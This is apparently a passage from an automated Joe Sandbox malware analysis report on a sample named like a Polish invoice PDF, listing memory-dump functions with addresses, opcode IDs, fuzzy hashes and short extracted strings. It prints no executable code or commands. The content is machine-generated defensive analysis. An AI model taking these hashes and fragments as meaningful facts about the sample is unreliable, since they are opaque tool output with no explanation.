                                                                                      • Opcode ID: df6b7135a687de84553f4d62440ac4bf5b8113a2a6804b56e6187d8db0d8741f
                                                                                      • Instruction ID: 80b44822834a061ba4228ecf0e5df8d8b1595f666eb10aa8da25e2a05526d5e6
                                                                                      • Opcode Fuzzy Hash: df6b7135a687de84553f4d62440ac4bf5b8113a2a6804b56e6187d8db0d8741f
                                                                                      • Instruction Fuzzy Hash: F8E01274A0120CEFCB44DFB5EA517ADBBF6EB49200F10959DE905E7240DD715F10AB91
                                                                                      Function 06764C41 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 54e52afcf485f0c785467203d401b9fe6965c2c9df4b283bbd950bb9cd529844
                                                                                      • Instruction ID: 0084b93c9e04050e7a9f5bc0e5eb4eacb77375cdbb9c445d016d4a4f68c27552
                                                                                      • Opcode Fuzzy Hash: 54e52afcf485f0c785467203d401b9fe6965c2c9df4b283bbd950bb9cd529844
                                                                                      • Instruction Fuzzy Hash: 6FD05E3A00D2845FC3568B24E810CB07FB59F1621432986A2F5848B333C2229C58C661
                                                                                      Function 06766B58 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27ce351bf8f81fee9d8e9990c4d54747db082e44a68dd0457012bacdbc709013
                                                                                      • Instruction ID: c4cb8abdc5029fb4eab8a6a7b9bbf2d08f98d0f3d6f37f1fd5c9d0f5f57baea7
                                                                                      • Opcode Fuzzy Hash: 27ce351bf8f81fee9d8e9990c4d54747db082e44a68dd0457012bacdbc709013
                                                                                      • Instruction Fuzzy Hash: 22D05E76015344EFC7128F25E805CB17F68AB163643590192F444CB133C2229814CA76
                                                                                      Function 066AACF8 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1877c4ddd1c1c5fe25c01a50ce1c73ffb7a6998db6671e771a387830b5c21fa
                                                                                      • Instruction ID: 108bfac1f8212784aa2b81f9ef845d0dc7d93f2e05de95ed6e7cc5502ad2d659
                                                                                      • Opcode Fuzzy Hash: c1877c4ddd1c1c5fe25c01a50ce1c73ffb7a6998db6671e771a387830b5c21fa
                                                                                      • Instruction Fuzzy Hash: FEE01270A0110CEFCB44DFA8E94169EB7F5FB45304F105598E809E3345EE316F00A795
                                                                                      Function 0676DE60 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35933441aed9406e1610fd06459a45dec2570ac7b55eec32233d6066be7f6616
                                                                                      • Instruction ID: d08fdcb88fc480a4bf689e4dbee93362b352457683a0d0c7040e419f3e9f8578
                                                                                      • Opcode Fuzzy Hash: 35933441aed9406e1610fd06459a45dec2570ac7b55eec32233d6066be7f6616
                                                                                      • Instruction Fuzzy Hash: A3D05E70609108EBC7A4CB95D940A78F7ACDF5A214F10809CEC0853351CA32AD02C790
                                                                                      Function 0676CE80 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35933441aed9406e1610fd06459a45dec2570ac7b55eec32233d6066be7f6616
                                                                                      • Instruction ID: fa6f14a4f8164d22d4010fb63a7b0c3c3209abae2cab24442ec8a64fad062341
                                                                                      • Opcode Fuzzy Hash: 35933441aed9406e1610fd06459a45dec2570ac7b55eec32233d6066be7f6616
                                                                                      • Instruction Fuzzy Hash: 70D05E3450A108DBC764CB95D901A78B7BCDB4A214F1080DDAC0857351CA32AD02C790
                                                                                      Function 06768D30 Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d13c99fb14428569a8ba26cc686cd1b67b850faebd09fb6d36e89260537bde33
                                                                                      • Instruction ID: be5f11682f3802b356bcffa9e87afe34ba05c3253446395296a99cbdde2ad24c
                                                                                      • Opcode Fuzzy Hash: d13c99fb14428569a8ba26cc686cd1b67b850faebd09fb6d36e89260537bde33
                                                                                      • Instruction Fuzzy Hash: ABD05E320487849FC7068B58D8244E47F259A2B60430880A3E944CE222D7229802C772
                                                                                      Function 00D78527 Relevance: .0, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 645f1ff2b5f370e6b24ab139a3ad8a337a29e6164679d41b5b611b3750c43397
                                                                                      • Instruction ID: ce78e674930dce5400ed1bcdc3915267bdd20221329fa5d8f62da051fb3f88cd
                                                                                      • Opcode Fuzzy Hash: 645f1ff2b5f370e6b24ab139a3ad8a337a29e6164679d41b5b611b3750c43397
                                                                                      • Instruction Fuzzy Hash: 76E07EB4A00258CBEB20CF24C844B9EB7F0BB08340F208296A949AB244DBB49E808E54
                                                                                      Function 06769A4F Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 85fe7f72b5b821418ebc213287e8d12f26622809d295bca2fad9807f6e464c9b
                                                                                      • Instruction ID: d33e91ddf447220ffcbf9c668233cc50d012c683358d6176e0b1842c563b703a
                                                                                      • Opcode Fuzzy Hash: 85fe7f72b5b821418ebc213287e8d12f26622809d295bca2fad9807f6e464c9b
                                                                                      • Instruction Fuzzy Hash: B9D05E764152806FC312C7108985861FFE8AF46518318C8CDD48947213C7269C03CB00
                                                                                      Function 00D70CE1 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cbe23a330a625cb531903973315f2525dd1cd2c789157c5d20ddec9d6a715740
                                                                                      • Instruction ID: 1b85c8142acee29a11c4e86463b89f93a0c3dc2eefd32113afde959fb98f331b
                                                                                      • Opcode Fuzzy Hash: cbe23a330a625cb531903973315f2525dd1cd2c789157c5d20ddec9d6a715740
                                                                                      • Instruction Fuzzy Hash: ABD0A735400160C6D70CBF18F81027D3A61BF51350F55C828DA4E972A4FF306F4A66B3
                                                                                      Function 06762780 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3f0c37a9dcae1ff0665deaf8cf7f116baa0f001c8ceaded6e58e2f3984d4ba4b
                                                                                      • Instruction ID: ec18f9cb749462548d890cc36adaea4580f47345158e1f89f3537180b3d85e71
                                                                                      • Opcode Fuzzy Hash: 3f0c37a9dcae1ff0665deaf8cf7f116baa0f001c8ceaded6e58e2f3984d4ba4b
                                                                                      • Instruction Fuzzy Hash: 26B0920220B2942EE24622A02E11CFB7B29DCC32F13A641D3E4408A052400A0E4642F2
                                                                                      Function 00D711E7 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f35d125de77bbb204ada5a8502d0bcde23938c451a9a624269022811a2a55d1c
                                                                                      • Instruction ID: cc043c5bbb9469c4b98a58ee51c9d4c440229602a6167236d046aaeb7302b1c6
                                                                                      • Opcode Fuzzy Hash: f35d125de77bbb204ada5a8502d0bcde23938c451a9a624269022811a2a55d1c
                                                                                      • Instruction Fuzzy Hash: 7DD05E36900190CBD7189F1AD8041A97BF0BB5930071AC069C64EAB261F730B9469AA1
                                                                                      Function 066AF4B0 Relevance: .0, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e23b850a6720728d6a6e85236cb44828fbac557b9d86f6187ab93d40e403b3e
                                                                                      • Instruction ID: e0d4d375e40df8abc4d567a3f75b3549235dc71dcefcb6d44622a04d14b5497c
                                                                                      • Opcode Fuzzy Hash: 2e23b850a6720728d6a6e85236cb44828fbac557b9d86f6187ab93d40e403b3e
                                                                                      • Instruction Fuzzy Hash: DAC02BF64063105EF3862711DD0850F7A17EFE0B01F01446BF689C5050C336DC94E292
                                                                                      Function 00D70880 Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03b6740d29ec7ad97c9abd0e0555c410edb5a62ef438c2a3651f1fa8c71de30e
                                                                                      • Instruction ID: 0970b3be1ca581595a216ab9a1e497320292227882fb5e47f002d28967e6955d
                                                                                      • Opcode Fuzzy Hash: 03b6740d29ec7ad97c9abd0e0555c410edb5a62ef438c2a3651f1fa8c71de30e
                                                                                      • Instruction Fuzzy Hash: 82C0025141E7C09FEB23576119294947F605C9310075A08C6E4C0DA1A3D1184A09C777
                                                                                      Function 066A6E9D Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 87d669d0386865dfed8cd61a56ea47b42c21410cb2fc08306ff549d4d7a41e69
                                                                                      • Instruction ID: 7514efb5f74b86f464722275754adbd8ef9fc6e232a97968089c2093b8cdb06f
                                                                                      • Opcode Fuzzy Hash: 87d669d0386865dfed8cd61a56ea47b42c21410cb2fc08306ff549d4d7a41e69
                                                                                      • Instruction Fuzzy Hash: D9C01236E00009DF8B40EFC8E8408CDB774FB84331F008026D620A7208C6306926CF80
                                                                                      Function 00D708A0 Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 02a3fbffcd6ebf7b08dc018b4a2c602dc1323c34f19d0cc12de69cb34cbb7224
                                                                                      • Instruction ID: 2e1b7cadb618bf1ed2f476f7aed7fedc0c80852793746235ae5bf88f113391af
                                                                                      • Opcode Fuzzy Hash: 02a3fbffcd6ebf7b08dc018b4a2c602dc1323c34f19d0cc12de69cb34cbb7224
                                                                                      • Instruction Fuzzy Hash: 13C08C2108C3C8DFE31223603809C257F680963202F4800C6A888C9293E094182882B3
                                                                                      Function 06764C50 Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                      • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                      • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                      • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                      Function 065C2648 Relevance: .0, Instructions: 7COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd8a5ec9e4824ef14ebcc8e79c72203ecc4b39a9b406348a01faf77bc3dde6b2
                                                                                      • Instruction ID: 930ceaaa2502b528417fc32f69f521563a2325c466525a348697ad6140d62b6d
                                                                                      • Opcode Fuzzy Hash: cd8a5ec9e4824ef14ebcc8e79c72203ecc4b39a9b406348a01faf77bc3dde6b2
                                                                                      • Instruction Fuzzy Hash: 05B01230D2500CEF8B40CED4900017CF3B0E749110F0081CA9C1C93300D53146104FC0
                                                                                      Function 06768D40 Relevance: .0, Instructions: 7COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2f0e34d1c73b22464401d12e5755c141d44429be3a46a5c5c17d0eba31eb1c2
                                                                                      • Instruction ID: 8b307d527b8cd499835494172599c55554f0fdfc2984f07dc855b09e21d28016
                                                                                      • Opcode Fuzzy Hash: b2f0e34d1c73b22464401d12e5755c141d44429be3a46a5c5c17d0eba31eb1c2
                                                                                      • Instruction Fuzzy Hash: 5DB0123204030CEBC7009F94EC14C95BF6DEB68B11740C025F60986221CB73F862DBE4
                                                                                      Function 00D708B0 Relevance: .0, Instructions: 5COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f307536dc9285d2ff03287a6c48a8bdaea22e21cbcd8f72734c269686e2415d7
                                                                                      • Instruction ID: 0b0dd1fc3ec34c8483b26f166c7d639c77ce16762e8e664ca14d4258c6262995
                                                                                      • Opcode Fuzzy Hash: f307536dc9285d2ff03287a6c48a8bdaea22e21cbcd8f72734c269686e2415d7
                                                                                      • Instruction Fuzzy Hash: E5900231044B0CCF45502B957909D55775D95546177800091A50D856555A65641145B5

                                                                                      Non-executed Functions

                                                                                      Function 066A1902 Relevance: 8.2, Strings: 5, Instructions: 1915COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: TJxq$V$xJ$$sq$$sq
                                                                                      • API String ID: 0-3679810389
                                                                                      • Opcode ID: 01ab571e01ad756539c276d885602ea8d050ae7a06d53cbdd651dce2a1047ddb
                                                                                      • Instruction ID: ed9f7e68aaca43ca4764b391154ef70214268264d9b283087d89b12b92a255e6
                                                                                      • Opcode Fuzzy Hash: 01ab571e01ad756539c276d885602ea8d050ae7a06d53cbdd651dce2a1047ddb
                                                                                      • Instruction Fuzzy Hash: FA13D37A610114AFDB469F94DD44E9ABBB3FB8D314B0680D4E6099B236C732DDA1EF10
                                                                                      Function 06495B98 Relevance: 4.0, Strings: 3, Instructions: 244COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: TJxq$Tesq$xbvq
                                                                                      • API String ID: 0-371669003
                                                                                      • Opcode ID: 7e7bb38ecf5dbbd2f9ffc0c1d24d2f90c812ee514233e749a8699c3862cf23ff
                                                                                      • Instruction ID: 93a5f4ef1409334f63d62c0c56b7695f7943e66d14adce8a61e0eab88cdfd418
                                                                                      • Opcode Fuzzy Hash: 7e7bb38ecf5dbbd2f9ffc0c1d24d2f90c812ee514233e749a8699c3862cf23ff
                                                                                      • Instruction Fuzzy Hash: 71B17A75E015188FDB68DF6AD9446DDBBF2AF89300F14C1AAD809AB365DB305E81CF50
                                                                                      Function 066AF01A Relevance: 2.8, Strings: 2, Instructions: 344COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq$,wq
                                                                                      • API String ID: 0-2981683845
                                                                                      • Opcode ID: b082c8eef2777131da3add2237341bc404957775cf7375de0999a1a8ca830826
                                                                                      • Instruction ID: ef5a32fa23272024bc01fb13cfce14ca2a4f9acd9cef28d27193660434756535
                                                                                      • Opcode Fuzzy Hash: b082c8eef2777131da3add2237341bc404957775cf7375de0999a1a8ca830826
                                                                                      • Instruction Fuzzy Hash: A6D10A74A006059FDB54DF69C584AAEBBF2FF88310F258599E4459B361CB30EC82CF91
                                                                                      Function 066A9A9E Relevance: 2.8, Strings: 2, Instructions: 313COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$xJ
                                                                                      • API String ID: 0-4165237231
                                                                                      • Opcode ID: c62b5b5ce5e40257fe572e26c3765c15d563463e280ac0378410ef4852991881
                                                                                      • Instruction ID: 44d0e2356b9974e4566a5c4d5d0434dbb1ce2770b9a10a495103c2fcb3eac004
                                                                                      • Opcode Fuzzy Hash: c62b5b5ce5e40257fe572e26c3765c15d563463e280ac0378410ef4852991881
                                                                                      • Instruction Fuzzy Hash: 1BE1E374E11258CFDBA4DF68D884B99B7F2FB89300F2081AAD909A7355DB705E91CF50
                                                                                      Function 066AA6C0 Relevance: 2.8, Strings: 2, Instructions: 256COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$xJ
                                                                                      • API String ID: 0-4165237231
                                                                                      • Opcode ID: a4f958570b1290ec5df0764757ed7d9adaf1667e3d4cd0998b62fbd581f5c522
                                                                                      • Instruction ID: eec856c43c9a4483425d15a1bd7e1cf9edde11b69695c2075a6348a4155e8ab3
                                                                                      • Opcode Fuzzy Hash: a4f958570b1290ec5df0764757ed7d9adaf1667e3d4cd0998b62fbd581f5c522
                                                                                      • Instruction Fuzzy Hash: 94B1E474E01218CFEB64DFA9D980B9DBBF2BB89310F1080AAD508A7345DB355D86CF50
                                                                                      Function 066AA6D0 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$xJ
                                                                                      • API String ID: 0-4165237231
                                                                                      • Opcode ID: edc9a784b0c1bc635872152573c1ceae187eb30f725a5bff9b34b34d962b3cff
                                                                                      • Instruction ID: 4d011a408878b73e230714fd8d9b841c71e388fe933b2445090a82c6f68b6859
                                                                                      • Opcode Fuzzy Hash: edc9a784b0c1bc635872152573c1ceae187eb30f725a5bff9b34b34d962b3cff
                                                                                      • Instruction Fuzzy Hash: 7EB1F474E05218CFEBA4DFA9D980B9DBBF2BB89300F10906AD509A7345DB356D86CF50
                                                                                      Function 0676D380 Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: dwq$xJ
                                                                                      • API String ID: 0-454413501
                                                                                      • Opcode ID: d72cbfad7fdb0b1ad44c65149c0bf546becf1243abe653c53809e3ba2f9eb922
                                                                                      • Instruction ID: a6109f4b25db9709fa0696c7e33ba10ae0ca35b438b89570e73fd0a5f914d277
                                                                                      • Opcode Fuzzy Hash: d72cbfad7fdb0b1ad44c65149c0bf546becf1243abe653c53809e3ba2f9eb922
                                                                                      • Instruction Fuzzy Hash: CE812374E10218CFDB60DFAAD8847ADBBB2FF89304F109069E849A7254DB745D89CF51
                                                                                      Function 00D73182 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq$4'sq
                                                                                      • API String ID: 0-780347173
                                                                                      • Opcode ID: 644a46654cd9d3f12297cdd4225f097291d6870baee223910a4349619c956c41
                                                                                      • Instruction ID: f236443aa90b7e342ee7a97ef6db88a134552f1762b4f8a2934392704da747ba
                                                                                      • Opcode Fuzzy Hash: 644a46654cd9d3f12297cdd4225f097291d6870baee223910a4349619c956c41
                                                                                      • Instruction Fuzzy Hash: DF71FB70E042048FD718EF6AE890699BBF2FFCA300F14C569D008DB369DF755946AB65
                                                                                      Function 00D73190 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq$4'sq
                                                                                      • API String ID: 0-780347173
                                                                                      • Opcode ID: f0e85511b8749d0965e3189cd95a841c0a7d5e56cc0d705a905c0b1dc193cc06
                                                                                      • Instruction ID: 164e2f63450e03f9643712f052ad65845a5467e6a3afeb040e4fb561ec56b8a4
                                                                                      • Opcode Fuzzy Hash: f0e85511b8749d0965e3189cd95a841c0a7d5e56cc0d705a905c0b1dc193cc06
                                                                                      • Instruction Fuzzy Hash: 7471FA70E042048FD718EF6AE89069ABBF2FFCA300F14C529D008DB369DF755946AB65
                                                                                      Function 066A0040 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
